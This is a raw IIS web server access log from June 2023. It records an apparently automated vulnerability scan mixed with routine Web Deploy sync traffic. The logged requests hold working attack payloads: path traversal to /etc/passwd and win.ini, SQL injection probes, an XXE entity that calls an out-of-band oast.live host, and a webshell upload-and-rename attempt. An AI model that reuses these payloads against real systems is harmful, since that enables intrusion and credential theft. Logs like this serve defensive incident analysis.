2023-06-26 05:26:46 103.153.214.94 GET /wp-admin/admin-ajax.php action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 05:38:30 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 0 36
2023-06-26 05:38:30 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 0 39
2023-06-26 05:38:31 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 0 57
2023-06-26 05:38:31 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 0 36
2023-06-26 05:43:52 103.153.214.94 GET /api/filemanager path=%2F..%2f..%2fContent 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 31
2023-06-26 05:57:30 103.153.214.94 POST /clients/editclient.php action=update&id=2ReXaxeGc2nZHXAdcBpZm1Q7slK 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 27
2023-06-26 05:57:30 103.153.214.94 GET /logos_clients/1.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 05:59:52 103.153.214.94 GET /bonita/portal/themeResource location=etc/passwd&theme=portal/../../../../../../../../../../../../../../../../ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 28
2023-06-26 05:59:52 103.153.214.94 GET /bonita/portal/themeResource location=Windows/win.ini&theme=portal/../../../../../../../../../../../../../../../../ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 23
2023-06-26 06:03:39 103.153.214.94 GET /gespage/doDownloadData file_name=../../../../../Windows/debug/NetSetup.log 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 06:21:33
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 06:21:32 103.153.214.94 GET /xmlpserver/convert _xf=Excel&_xl=123&template=123&xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cibehhqofm2ke57n2m2gp49djzu9wdmqa.oast.live/xxe.xml">%25sp%3b%25param1%3b]> 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 30
2023-06-26 06:28:44 103.153.214.94 GET /index.php item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(999999999)),1)&option=com_contenthistory&type_id=1&view=history 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 28
2023-06-26 06:33:31 103.153.214.94 GET /nagiosxi/login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 29
2023-06-26 06:40:09 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 26
2023-06-26 06:40:09 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 22
2023-06-26 06:43:44 103.153.214.94 POST /search.php searchtype=5 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 30
2023-06-26 06:47:44 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-06-26 06:47:44 103.153.214.94 GET /page/exportImport/fileTransfer/poc.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 24
2023-06-26 06:49:34 103.153.214.94 GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 28
2023-06-26 06:49:49 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 171.231.192.77 - - 401 2 5 52
2023-06-26 06:49:49 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 57
2023-06-26 06:49:49 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 85
2023-06-26 06:49:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 1106
2023-06-26 06:49:50 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=dad8a6cd-5002-4ed3-acd8-f913fa9f7cd2;op=Sync - 200 0 0 592
2023-06-26 06:49:50 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 31
2023-06-26 06:50:00 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 10247
2023-06-26 06:50:00 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=dad8a6cd-5002-4ed3-acd8-f913fa9f7cd2;op=Sync - 200 0 0 10141
2023-06-26 06:55:10 103.153.214.94 GET /src/read_body.php mailbox=/etc/passwd&passed_id=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
2023-06-26 06:55:10 103.153.214.94 GET /src/download.php absolute_dl=true&mailbox=/etc/passwd&passed_ent_id=1&passed_id=1 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 22
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 07:17:48
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 07:17:48 103.153.214.94 POST /api/admin/login - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 28
2023-06-26 07:28:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 34
2023-06-26 07:28:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 33
2023-06-26 07:28:05 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 663
2023-06-26 07:28:05 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=6a7cd483-ae00-4c02-a88c-c7b6185ab691;op=Sync - 200 0 0 204
2023-06-26 07:28:05 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 26
2023-06-26 07:28:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 4376
2023-06-26 07:28:11 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=6a7cd483-ae00-4c02-a88c-c7b6185ab691;op=Sync - 200 0 0 4285
2023-06-26 07:32:12 103.153.214.94 GET /Default.aspx - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27
2023-06-26 07:33:35 103.153.214.94 GET /file=C:/Windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 400 0 0 35
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 07:56:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 07:56:21 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&var:page=deviceinfo 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 25
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 08:14:34
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 08:14:34 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 33
2023-06-26 08:14:34 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 31
2023-06-26 08:14:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=25e45053-4c58-4497-9d95-0fae4317661c;op=Sync - 200 0 0 143
2023-06-26 08:14:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 631
2023-06-26 08:14:35 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 27
2023-06-26 08:14:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=25e45053-4c58-4497-9d95-0fae4317661c;op=Sync - 200 0 0 431
2023-06-26 08:14:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 527
2023-06-26 08:16:43 103.153.214.94 GET /plugins/servlet/snjCustomDesignConfig fileMime=$textMime&fileName=../dbconfig.xmlpasswd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 32
2023-06-26 08:21:17 103.153.214.94 GET /phpwiki/index.php/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 30
2023-06-26 08:27:10 103.153.214.94 GET /index.php controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 26
2023-06-26 08:33:53 103.153.214.94 GET /plus/carbuyaction.php code=../../&dopost=return 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-06-26 08:48:07 103.153.214.94 POST /MUP/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 bcvt.kontum.gov.vn:8172/MUP 404 7 0 32
2023-06-26 08:48:31 103.153.214.94 POST /php/upload.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 28
2023-06-26 08:48:31 103.153.214.94 POST /php/renamefile.php f=%2Fapp%2FUploads%2F2ReXao6cBEk8zrJbLpV4TxTwPWB.jpg&n=2ReXao6cBEk8zrJbLpV4TxTwPWB.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25
2023-06-26 08:48:31 103.153.214.94 POST /php/movefile.php f=%2Fapp%2FUploads%2F2ReXao6cBEk8zrJbLpV4TxTwPWB.jpg&n=%2Fapp%2FUploads%2F2ReXao6cBEk8zrJbLpV4TxTwPWB.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-26 08:48:31 103.153.214.94 GET /Uploads/2ReXao6cBEk8zrJbLpV4TxTwPWB.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 23
2023-06-26 08:50:55 103.153.214.94 GET /admin/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-06-26 09:01:24 103.153.214.94 POST /cgi-bin/luci/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 29
2023-06-26 09:05:32 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 30
2023-06-26 09:05:32 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 28
2023-06-26 09:05:34 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=95c3ddb3-7436-4126-8869-0c454109bc61;op=Sync - 200 0 0 117
2023-06-26 09:05:34 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 575
2023-06-26 09:05:34 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 27
2023-06-26 09:05:38 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 4298
2023-06-26 09:05:38 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=95c3ddb3-7436-4126-8869-0c454109bc61;op=Sync - 200 0 0 4204
2023-06-26 09:08:31 103.153.214.94 GET /opac_css/getgif.php chemin=../../../../../../etc/passwd&nomgif=tarik 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
2023-06-26 09:08:31 103.153.214.94 GET /pmb/opac_css/getgif.php chemin=../../../../../../etc/passwd&nomgif=tarik 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-06-26 09:13:12 103.153.214.94 GET /ftpsync.settings - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28
2023-06-26 09:13:50 103.153.214.94 POST /magmi/web/magmi_saveprofile.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29
2023-06-26 09:13:50 103.153.214.94 POST /magmi/web/magmi_run.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 22
2023-06-26 09:13:50 103.153.214.94 GET /magmi/web/info.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 22
2023-06-26 09:22:03 103.153.214.94 GET /wp-admin/admin-post.php local-destination-id=/etc/passwd&local-download=/etc/passwd&page=pb_backupbuddy_destinations 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 09:41:20
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 09:41:20 103.153.214.94 GET /.netrc - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 31
2023-06-26 09:41:20 103.153.214.94 GET /_netrc - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 24
2023-06-26 09:43:27 103.153.214.94 GET /admin/ id=-6%27%20union%20select%201,md5('999999999'),3,4,5,6,7,8,9,10,11--+&page=user/manage_user 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27
2023-06-26 09:46:23 103.153.214.94 GET /installation/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 30
2023-06-26 09:52:30 103.153.214.94 GET /install/ step=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-06-26 10:01:23 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 25
2023-06-26 10:01:23 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 56
2023-06-26 10:01:23 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 650
2023-06-26 10:01:23 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=eeaa92fc-69df-4a76-9ac6-57dfa8583bde;op=Sync - 200 0 0 177
2023-06-26 10:01:24 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 28
2023-06-26 10:01:24 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 VSCmdLine:WTE6.0.6.36821;sid=eeaa92fc-69df-4a76-9ac6-57dfa8583bde;op=Sync - 200 0 0 783
2023-06-26 10:01:24 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.192.77 - - 200 0 0 878
2023-06-26 10:07:55 103.153.214.94 POST /druid/submitLogin - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 31
2023-06-26 10:07:55 103.153.214.94 POST /submitLogin - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 22
2023-06-26 10:09:41 103.153.214.94 GET /horde/util/barcode.php type=../../../../../../../../../../../etc/./passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-06-26 10:21:40 103.153.214.94 GET /wp-content/plugins/mypixs/mypixs/downloadpage.php url=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 10:38:10
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 10:38:10 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 26
2023-06-26 10:43:45 103.153.214.94 GET /exportFile UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 26
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=dev&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=devel&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 21
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=stg&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 22
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=stag&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 21
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=staging&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 10:44:29 103.153.214.94 GET / SPX_KEY=prd&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 24
2023-06-26 10:44:30 103.153.214.94 GET / SPX_KEY=prod&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 22
2023-06-26 10:44:30 103.153.214.94 GET / SPX_KEY=production&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 24
2023-06-26 10:44:30 103.153.214.94 GET / SPX_KEY=test&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 28
2023-06-26 10:44:30 103.153.214.94 GET / SPX_KEY=testing&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 22
2023-06-26 10:44:30 103.153.214.94 GET / SPX_KEY=spx&SPX_UI_URI=/ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 23
2023-06-26 10:46:53 103.153.214.94 GET /cgi-bin/cgiServer.exx page=../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 25
2023-06-26 10:49:44 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_fabrik 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 11:05:08
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
